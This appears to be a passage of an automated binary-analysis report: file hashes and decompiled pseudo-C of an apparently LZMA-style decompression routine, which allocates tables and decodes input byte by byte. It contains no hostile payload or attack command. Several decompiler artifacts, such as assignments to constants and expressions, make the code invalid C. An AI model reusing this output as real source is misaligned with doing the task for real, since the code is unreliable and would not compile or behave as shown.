                                                                                            • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                                                                                            • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                                                                                            • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                                                                                            • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 98%
                                                                                            			E00406409() {
                                                                                            				unsigned short _t531;
                                                                                            				signed int _t532;
                                                                                            				void _t533;
                                                                                            				signed int _t534;
                                                                                            				signed int _t535;
                                                                                            				signed int _t565;
                                                                                            				signed int _t568;
                                                                                            				signed int _t589;
                                                                                            				signed int* _t606;
                                                                                            				void* _t613;
                                                                                            
                                                                                            				L0:
                                                                                            				while(1) {
                                                                                            					L0:
                                                                                            					if( *(_t613 - 0x40) != 0) {
                                                                                            						 *(_t613 - 0x84) = 0xb;
                                                                                            						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                            						goto L132;
                                                                                            					} else {
                                                                                            						__eax =  *(__ebp - 0x28);
                                                                                            						L88:
                                                                                            						 *(__ebp - 0x2c) = __eax;
                                                                                            						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            						L89:
                                                                                            						__eax =  *(__ebp - 4);
                                                                                            						 *(__ebp - 0x80) = 0x15;
                                                                                            						__eax =  *(__ebp - 4) + 0xa68;
                                                                                            						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                            						L69:
                                                                                            						 *(__ebp - 0x84) = 0x12;
                                                                                            						while(1) {
                                                                                            							L132:
                                                                                            							 *(_t613 - 0x54) = _t606;
                                                                                            							while(1) {
                                                                                            								L133:
                                                                                            								_t531 =  *_t606;
                                                                                            								_t589 = _t531 & 0x0000ffff;
                                                                                            								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                            								if( *(_t613 - 0xc) >= _t565) {
                                                                                            									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                            									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                            									 *(_t613 - 0x40) = 1;
                                                                                            									_t532 = _t531 - (_t531 >> 5);
                                                                                            									 *_t606 = _t532;
                                                                                            								} else {
                                                                                            									 *(_t613 - 0x10) = _t565;
                                                                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                            									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                            								}
                                                                                            								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                            									goto L139;
                                                                                            								}
                                                                                            								L137:
                                                                                            								if( *(_t613 - 0x6c) == 0) {
                                                                                            									 *(_t613 - 0x88) = 5;
                                                                                            									L170:
                                                                                            									_t568 = 0x22;
                                                                                            									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                            									_t535 = 0;
                                                                                            									L172:
                                                                                            									return _t535;
                                                                                            								}
                                                                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                            								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                            								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                            								L139:
                                                                                            								_t533 =  *(_t613 - 0x84);
                                                                                            								while(1) {
                                                                                            									 *(_t613 - 0x88) = _t533;
                                                                                            									while(1) {
                                                                                            										L1:
                                                                                            										_t534 =  *(_t613 - 0x88);
                                                                                            										if(_t534 > 0x1c) {
                                                                                            											break;
                                                                                            										}
                                                                                            										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                                                                                            											case 0:
                                                                                            												if( *(_t613 - 0x6c) == 0) {
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                            												_t534 =  *( *(_t613 - 0x70));
                                                                                            												if(_t534 > 0xe1) {
                                                                                            													goto L171;
                                                                                            												}
                                                                                            												_t538 = _t534 & 0x000000ff;
                                                                                            												_push(0x2d);
                                                                                            												asm("cdq");
                                                                                            												_pop(_t570);
                                                                                            												_push(9);
                                                                                            												_pop(_t571);
                                                                                            												_t609 = _t538 / _t570;
                                                                                            												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                            												asm("cdq");
                                                                                            												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                            												 *(_t613 - 0x3c) = _t604;
                                                                                            												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                            												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                            												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                            												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                            													L10:
                                                                                            													if(_t612 == 0) {
                                                                                            														L12:
                                                                                            														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                            														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                            														goto L15;
                                                                                            													} else {
                                                                                            														goto L11;
                                                                                            													}
                                                                                            													do {
                                                                                            														L11:
                                                                                            														_t612 = _t612 - 1;
                                                                                            														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                            													} while (_t612 != 0);
                                                                                            													goto L12;
                                                                                            												}
                                                                                            												if( *(_t613 - 4) != 0) {
                                                                                            													GlobalFree( *(_t613 - 4));
                                                                                            												}
                                                                                            												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                            												 *(_t613 - 4) = _t534;
                                                                                            												if(_t534 == 0) {
                                                                                            													goto L171;
                                                                                            												} else {
                                                                                            													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                            													goto L10;
                                                                                            												}
                                                                                            											case 1:
                                                                                            												L13:
                                                                                            												__eflags =  *(_t613 - 0x6c);
                                                                                            												if( *(_t613 - 0x6c) == 0) {
                                                                                            													 *(_t613 - 0x88) = 1;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                            												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                            												_t45 = _t613 - 0x48;
                                                                                            												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                            												__eflags =  *_t45;
                                                                                            												L15:
                                                                                            												if( *(_t613 - 0x48) < 4) {
                                                                                            													goto L13;
                                                                                            												}
                                                                                            												_t546 =  *(_t613 - 0x40);
                                                                                            												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                            													L20:
                                                                                            													 *(_t613 - 0x48) = 5;
                                                                                            													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                            													goto L23;
                                                                                            												}
                                                                                            												 *(_t613 - 0x74) = _t546;
                                                                                            												if( *(_t613 - 8) != 0) {
                                                                                            													GlobalFree( *(_t613 - 8));
                                                                                            												}
                                                                                            												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                            												 *(_t613 - 8) = _t534;
                                                                                            												if(_t534 == 0) {
                                                                                            													goto L171;
                                                                                            												} else {
                                                                                            													goto L20;
                                                                                            												}
                                                                                            											case 2:
                                                                                            												L24:
                                                                                            												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                            												 *(_t613 - 0x84) = 6;
                                                                                            												 *(_t613 - 0x4c) = _t553;
                                                                                            												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                            												L132:
                                                                                            												 *(_t613 - 0x54) = _t606;
                                                                                            												goto L133;
                                                                                            											case 3:
                                                                                            												L21:
                                                                                            												__eflags =  *(_t613 - 0x6c);
                                                                                            												if( *(_t613 - 0x6c) == 0) {
                                                                                            													 *(_t613 - 0x88) = 3;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                            												_t67 = _t613 - 0x70;
                                                                                            												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                            												__eflags =  *_t67;
                                                                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                            												L23:
                                                                                            												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                            												if( *(_t613 - 0x48) != 0) {
                                                                                            													goto L21;
                                                                                            												}
                                                                                            												goto L24;
                                                                                            											case 4:
                                                                                            												L133:
                                                                                            												_t531 =  *_t606;
                                                                                            												_t589 = _t531 & 0x0000ffff;
                                                                                            												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                            												if( *(_t613 - 0xc) >= _t565) {
                                                                                            													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                            													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                            													 *(_t613 - 0x40) = 1;
                                                                                            													_t532 = _t531 - (_t531 >> 5);
                                                                                            													 *_t606 = _t532;
                                                                                            												} else {
                                                                                            													 *(_t613 - 0x10) = _t565;
                                                                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                            													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                            												}
                                                                                            												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                            													goto L139;
                                                                                            												}
                                                                                            											case 5:
                                                                                            												goto L137;
                                                                                            											case 6:
                                                                                            												__edx = 0;
                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                            													__eax =  *(__ebp - 4);
                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                            													 *(__ebp - 0x34) = 1;
                                                                                            													 *(__ebp - 0x84) = 7;
                                                                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                            													while(1) {
                                                                                            														L132:
                                                                                            														 *(_t613 - 0x54) = _t606;
                                                                                            														goto L133;
                                                                                            													}
                                                                                            												}
                                                                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                            												__esi =  *(__ebp - 0x60);
                                                                                            												__cl = 8;
                                                                                            												__cl = 8 -  *(__ebp - 0x3c);
                                                                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                            												__ecx =  *(__ebp - 0x3c);
                                                                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                            												__ecx =  *(__ebp - 4);
                                                                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                            												__eflags =  *(__ebp - 0x38) - 4;
                                                                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            												if( *(__ebp - 0x38) >= 4) {
                                                                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                            													if( *(__ebp - 0x38) >= 0xa) {
                                                                                            														_t98 = __ebp - 0x38;
                                                                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                            														__eflags =  *_t98;
                                                                                            													} else {
                                                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                            													}
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x38) = 0;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                            												if( *(__ebp - 0x34) == __edx) {
                                                                                            													__ebx = 0;
                                                                                            													__ebx = 1;
                                                                                            													goto L61;
                                                                                            												} else {
                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                                                            														__eflags = __eax;
                                                                                            													}
                                                                                            													__ecx =  *(__ebp - 8);
                                                                                            													__ebx = 0;
                                                                                            													__ebx = 1;
                                                                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                            													goto L41;
                                                                                            												}
                                                                                            											case 7:
                                                                                            												__eflags =  *(__ebp - 0x40) - 1;
                                                                                            												if( *(__ebp - 0x40) != 1) {
                                                                                            													__eax =  *(__ebp - 0x24);
                                                                                            													 *(__ebp - 0x80) = 0x16;
                                                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            													__eax =  *(__ebp - 0x28);
                                                                                            													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            													__eax =  *(__ebp - 0x2c);
                                                                                            													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            													__eax = 0;
                                                                                            													__eflags =  *(__ebp - 0x38) - 7;
                                                                                            													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            													__al = __al & 0x000000fd;
                                                                                            													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                            													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                            													__eax =  *(__ebp - 4);
                                                                                            													__eax =  *(__ebp - 4) + 0x664;
                                                                                            													__eflags = __eax;
                                                                                            													 *(__ebp - 0x58) = __eax;
                                                                                            													goto L69;
                                                                                            												}
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                            												 *(__ebp - 0x84) = 8;
                                                                                            												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                            												while(1) {
                                                                                            													L132:
                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                            													goto L133;
                                                                                            												}
                                                                                            											case 8:
                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                            													__eax =  *(__ebp - 4);
                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                            													 *(__ebp - 0x84) = 0xa;
                                                                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                            												} else {
                                                                                            													__eax =  *(__ebp - 0x38);
                                                                                            													__ecx =  *(__ebp - 4);
                                                                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                            													 *(__ebp - 0x84) = 9;
                                                                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                            												}
                                                                                            												while(1) {
                                                                                            													L132:
                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                            													goto L133;
                                                                                            												}
                                                                                            											case 9:
                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                            													goto L89;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x60);
                                                                                            												if( *(__ebp - 0x60) == 0) {
                                                                                            													goto L171;
                                                                                            												}
                                                                                            												__eax = 0;
                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                            												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                            												__eflags = _t259;
                                                                                            												0 | _t259 = _t259 + _t259 + 9;
                                                                                            												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                            												goto L76;
                                                                                            											case 0xa:
                                                                                            												goto L0;
                                                                                            											case 0xb:
                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                            													__ecx =  *(__ebp - 0x24);
                                                                                            													__eax =  *(__ebp - 0x20);
                                                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            												} else {
                                                                                            													__eax =  *(__ebp - 0x24);
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x28);
                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            												goto L88;
                                                                                            											case 0xc:
                                                                                            												L99:
                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0xc;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												_t334 = __ebp - 0x70;
                                                                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                            												__eflags =  *_t334;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                            												goto L101;
                                                                                            											case 0xd:
                                                                                            												L37:
                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0xd;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												_t122 = __ebp - 0x70;
                                                                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                            												__eflags =  *_t122;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												L39:
                                                                                            												__eax =  *(__ebp - 0x40);
                                                                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                            													goto L48;
                                                                                            												}
                                                                                            												__eflags = __ebx - 0x100;
                                                                                            												if(__ebx >= 0x100) {
                                                                                            													goto L54;
                                                                                            												}
                                                                                            												L41:
                                                                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                            												 *(__ebp - 0x48) = __eax;
                                                                                            												__eax = __eax + 1;
                                                                                            												__eax = __eax << 8;
                                                                                            												__eax = __eax + __ebx;
                                                                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            												__ax =  *__esi;
                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                            												__edx = __ax & 0x0000ffff;
                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            													__cx = __ax;
                                                                                            													 *(__ebp - 0x40) = 1;
                                                                                            													__cx = __ax >> 5;
                                                                                            													__eflags = __eax;
                                                                                            													__ebx = __ebx + __ebx + 1;
                                                                                            													 *__esi = __ax;
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                            													0x800 = 0x800 - __edx;
                                                                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                            													__ebx = __ebx + __ebx;
                                                                                            													 *__esi = __cx;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            													goto L39;
                                                                                            												} else {
                                                                                            													goto L37;
                                                                                            												}
                                                                                            											case 0xe:
                                                                                            												L46:
                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0xe;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												_t156 = __ebp - 0x70;
                                                                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                            												__eflags =  *_t156;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												while(1) {
                                                                                            													L48:
                                                                                            													__eflags = __ebx - 0x100;
                                                                                            													if(__ebx >= 0x100) {
                                                                                            														break;
                                                                                            													}
                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                            													__edx = __ebx + __ebx;
                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                            													__esi = __edx + __eax;
                                                                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            													__ax =  *__esi;
                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                            													__edi = __ax & 0x0000ffff;
                                                                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            													if( *(__ebp - 0xc) >= __ecx) {
                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            														__cx = __ax;
                                                                                            														_t170 = __edx + 1; // 0x1
                                                                                            														__ebx = _t170;
                                                                                            														__cx = __ax >> 5;
                                                                                            														__eflags = __eax;
                                                                                            														 *__esi = __ax;
                                                                                            													} else {
                                                                                            														 *(__ebp - 0x10) = __ecx;
                                                                                            														0x800 = 0x800 - __edi;
                                                                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            														__ebx = __ebx + __ebx;
                                                                                            														 *__esi = __cx;
                                                                                            													}
                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            														continue;
                                                                                            													} else {
                                                                                            														goto L46;
                                                                                            													}
                                                                                            												}
                                                                                            												L54:
                                                                                            												_t173 = __ebp - 0x34;
                                                                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                            												__eflags =  *_t173;
                                                                                            												goto L55;
                                                                                            											case 0xf:
                                                                                            												L58:
                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0xf;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												_t203 = __ebp - 0x70;
                                                                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                            												__eflags =  *_t203;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												L60:
                                                                                            												__eflags = __ebx - 0x100;
                                                                                            												if(__ebx >= 0x100) {
                                                                                            													L55:
                                                                                            													__al =  *(__ebp - 0x44);
                                                                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                            													goto L56;
                                                                                            												}
                                                                                            												L61:
                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                            												__edx = __ebx + __ebx;
                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                            												__esi = __edx + __eax;
                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            												__ax =  *__esi;
                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            													__cx = __ax;
                                                                                            													_t217 = __edx + 1; // 0x1
                                                                                            													__ebx = _t217;
                                                                                            													__cx = __ax >> 5;
                                                                                            													__eflags = __eax;
                                                                                            													 *__esi = __ax;
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                            													0x800 = 0x800 - __edi;
                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            													__ebx = __ebx + __ebx;
                                                                                            													 *__esi = __cx;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            													goto L60;
                                                                                            												} else {
                                                                                            													goto L58;
                                                                                            												}
                                                                                            											case 0x10:
                                                                                            												L109:
                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                            													 *(__ebp - 0x88) = 0x10;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												_t365 = __ebp - 0x70;
                                                                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                            												__eflags =  *_t365;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            												goto L111;
                                                                                            											case 0x11:
                                                                                            												goto L69;
                                                                                            											case 0x12:
                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                            													 *(__ebp - 0x84) = 0x13;
